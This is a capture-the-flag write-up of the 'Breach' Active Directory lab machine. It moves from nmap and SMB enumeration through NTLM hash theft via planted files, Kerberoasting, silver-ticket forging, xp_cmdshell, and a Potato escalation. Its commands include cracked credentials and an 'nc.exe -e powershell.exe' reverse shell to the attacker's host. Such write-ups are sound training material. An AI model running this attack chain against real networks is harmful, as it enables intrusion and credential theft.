# Breach - Writeup (Vulnlab & HTB)

## INFO | Ports & Services

```ruby
PORT     STATE SERVICE       VERSION
53/tcp   open  domain        Simple DNS Plus
80/tcp   open  http          Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
| http-methods:
|   Supported Methods: OPTIONS TRACE GET HEAD POST
|_  Potentially risky methods: TRACE
|_http-title: IIS Windows Server
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2025-10-13 03:38:48Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: breach.vl, Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  tcpwrapped
1433/tcp open  ms-sql-s      Microsoft SQL Server 2019 15.00.2000.00; RTM
| ms-sql-ntlm-info:
|   10.129.161.73:1433:
|     Target_Name: BREACH
|     NetBIOS_Domain_Name: BREACH
|     NetBIOS_Computer_Name: BREACHDC
|     DNS_Domain_Name: breach.vl
|     DNS_Computer_Name: BREACHDC.breach.vl
|     DNS_Tree_Name: breach.vl
|_    Product_Version: 10.0.20348
| ms-sql-info:
|   10.129.161.73:1433:
|     Version:
|       name: Microsoft SQL Server 2019 RTM
|       number: 15.00.2000.00
|       Product: Microsoft SQL Server 2019
|       Service pack level: RTM
|       Post-SP patches applied: false
|_    TCP port: 1433
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Issuer: commonName=SSL_Self_Signed_Fallback
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2025-10-13T03:32:19
| Not valid after:  2055-10-13T03:32:19
| MD5:     71a0 a7d1 0415 5273 c435 a1b7 3f3c a693
| SHA-1:   33ec 70c4 bb5c f6f9 70f0 a974 0d5e 8f58 61d8 0b19
|_SHA-256: bd49 856e b83c ee10 e888 7f2e 25f5 8c3c 1080 205c 4c16 2a57 af4b 3e37 2d87 8c2f
|_ssl-date: 2025-10-13T03:39:41+00:00; 0s from scanner time.
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: breach.vl, Site: Default-First-Site-Name)
3269/tcp open  tcpwrapped
3389/tcp open  ms-wbt-server Microsoft Terminal Services
| ssl-cert: Subject: commonName=BREACHDC.breach.vl
| Issuer: commonName=BREACHDC.breach.vl
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2025-09-07T08:04:48
| Not valid after:  2026-03-09T08:04:48
| MD5:     f457 54f6 0073 10ba ecb2 0f99 fca9 d035
| SHA-1:   ccc9 9cbf 5171 71cb 42e1 4951 243c e58c a229 cd36
|_SHA-256: 27dd 4b87 17d3 579e baa5 97f7 b638 7b2b ba05 ad39 fd81 d60f 4108 3a48 3602 55f8
|_ssl-date: 2025-10-13T03:39:41+00:00; 0s from scanner time.
| rdp-ntlm-info:
|   Target_Name: BREACH
|   NetBIOS_Domain_Name: BREACH
|   NetBIOS_Computer_Name: BREACHDC
|   DNS_Domain_Name: breach.vl
|   DNS_Computer_Name: BREACHDC.breach.vl
|   DNS_Tree_Name: breach.vl
|   Product_Version: 10.0.20348
|_  System_Time: 2025-10-13T03:39:01+00:00
5985/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
Service Info: Host: BREACHDC; OS: Windows; CPE: cpe:/o:microsoft:windows
```

---

# FOOTHOLD

The initial nmap scan indicates that we are dealing with a Windows AD environment. I performed a bruteforce attack on user RIDs using `netexec` to enumerate users.

```bash
nxc smb BREACHDC.breach.vl -u 'aasdad' -p '' --rid-brute
```

### Domain Users

```bash
Christine.Bruce
Claire.Pope
Diana.Pope
George.Williams
Hilary.Reed
Hugh.Watts
Jasmine.Price
Jasmine.Slater
Julia.Wong
Lawrence.Kaur
staff
svc_mssql
```

## SMB Guest Allowed

If we connect as **Guest** via SMB and enumerate shares, we get the following resources:

![](https://cdn.hashnode.com/res/hashnode/image/upload/v1760335422525/db73385c-a2a7-434b-86e0-3716e631886d.png align="center")

We have a folder with read and write permissions, which is interesting.

```bash
smbclient //10.129.161.73/share --no-pass
```

![](https://cdn.hashnode.com/res/hashnode/image/upload/v1760335446431/2c15a190-8c44-4e9e-b969-3a9b0e30193a.png align="center")

Since there is nothing useful inside, we can use these folders to upload our own files to steal NTLM hashes

The first step is to generate multiple files using ***ntlm\_theft.py***.

```bash
python3 ntlm_theft.py -g all -s 10.10.14.42 --filename testingFiles
```

Then I run responder:

```bash
responder -I tun0 -Pv
```

Finally, I upload all the files:

```bash
prompt off
mput *
```

![](https://cdn.hashnode.com/res/hashnode/image/upload/v1760335508659/1df64ae2-65b6-495c-941b-c0b4419c576a.png align="center")

After a while, I receive hashes from *Julia.Wong*:

![](https://cdn.hashnode.com/res/hashnode/image/upload/v1760335520791/a7ae15ef-f8e2-4cd8-afa6-7949d2badb07.png align="center")

We cracked it with Hashcat and obtained the password:

```bash
JULIA.WONG --> Computer1
```

## **SMB | User.txt**

Im now checking with the valid credentials of **Julia.Wong**, and in the shared resource *share*, we obtained the flag for *user.txt*.

![](https://cdn.hashnode.com/res/hashnode/image/upload/v1760335549390/4d327ea2-036c-45d0-81e0-3640a831bb00.png align="center")

## **Bloodhound**

Like in any environment, I like to know where I stand and what permissions I have, so I grab all the objects from Active Directory and run them through Bloodhound for analysis.

```bash

nxc ldap 10.129.161.73 -u 'JULIA.WONG' -p 'Computer1' --bloodhound -c all --dns-server 10.129.161.73
```

## **Kerberoast | SVC\_MSSQL**

By analyzing bloodhound, we can discover that the account *SVC\_MSSQL* appears to be kerberoastable.

![](https://cdn.hashnode.com/res/hashnode/image/upload/v1760335589906/5bb40056-bece-4eca-8647-7faa6c520f82.png align="center")

We carried out the kerberoast attack:

```bash
targetedKerberoast.py -v --dc-ip 10.129.161.73 -d breach.vl -u JULIA.WONG -p 'Computer1'
```

Finally we cracked it with hashcat:

```bash
svc_mssql -> Trustno1
```

## **MSSQLSvc**

Having valid credentials, we can connect to the SQL service that we observed during the initial scan with nmap:

```bash
mssqlclient.py 10.129.161.73/svc_mssql:'Trustno1'@10.129.161.73 -windows-auth
```

Even though we've compromised the account, we realize we don't have enough permissions to run commands. We can list stuff with *xp\_dirtree*, but we need command execution to make an real impact:

```plaintext
[%] exec master.dbo.sp_configure 'show advanced options',1;RECONFIGURE;exec master.dbo.sp_configure 'xp_cmdshell', 1;RECONFIGURE;
ERROR(BREACHDC\SQLEXPRESS): Line 105: User does not have permission to perform this action.
ERROR(BREACHDC\SQLEXPRESS): Line 1: You do not have permission to run the RECONFIGURE statement.
ERROR(BREACHDC\SQLEXPRESS): Line 62: The configuration option 'xp_cmdshell' does not exist, or it may be an advanced option.
ERROR(BREACHDC\SQLEXPRESS): Line 1: You do not have permission to run the RECONFIGURE statement.
```

# **Silver Ticket Abuse**

We can abuse silver tickets to escalate privileges. First, we obtain the Domain SID:

```bash
lookupsid.py 'breach.vl/svc_mssql@10.129.161.73'
```

![](https://cdn.hashnode.com/res/hashnode/image/upload/v1760335665841/fe9fbbcc-da52-4260-8d24-a87c3fae7911.png align="center")

> S-1-5-21-2330692793-3312915120-706255856

Next, we generate the NTHASH of the password of the service account that we control:

```bash
iconv -f ASCII -t UTF-16LE <(printf "Trustno1") | openssl dgst -md4
```

> MD4(stdin)= 69596c7aa1e8daee17f8e78870e25a5c

Finally, we generated the silver ticket:

```bash
ticketer.py -nthash 69596c7aa1e8daee17f8e78870e25a5c -domain-sid S-1-5-21-2330692793-3312915120-706255856 -dc-ip 10.10.77.106 -spn mssql/breachdc.breach.vl -domain breach.vl Administrator
```

![](https://cdn.hashnode.com/res/hashnode/image/upload/v1760335686933/47ca1005-5581-4376-bdd8-97f22f7ec2ea.png align="left")

We export the ticket and reconnect to the MSSQL service:

```bash
mssqlclient.py -k BREACHDC.breach.vl
```

We will see that this time we are *Administrator*:

![](https://cdn.hashnode.com/res/hashnode/image/upload/v1760335712057/2f90afe5-4231-4ba9-9cbf-9754923e9969.png align="center")

We enable xp\_cmdshell and then we can run any command on the system, we will get a revshell, in my case an encoded powershell:

![](https://cdn.hashnode.com/res/hashnode/image/upload/v1760335725074/d21e4965-12f0-425b-9f60-46aa59b1e7a3.png align="center")

![](https://cdn.hashnode.com/res/hashnode/image/upload/v1760335727416/d3e73833-88fd-4ae6-9ede-eeccc913f430.png align="center")

# **PrivEsc to Administrator**

Once inside the system, escalation is very easy.. we take advantage of the following privilege with any Potato of preference:

![](https://cdn.hashnode.com/res/hashnode/image/upload/v1760335749384/bb1cc505-e6ef-4d52-9dd6-bca590d4e225.png align="center")

```bash
.\god.exe -cmd "nc.exe -e powershell.exe 10.10.14.42 8000"
```

![](https://cdn.hashnode.com/res/hashnode/image/upload/v1760335773956/e5232448-57fc-4179-9058-919ae37e6fa0.png align="center")

Finally, we got the **root.txt** and pwned!
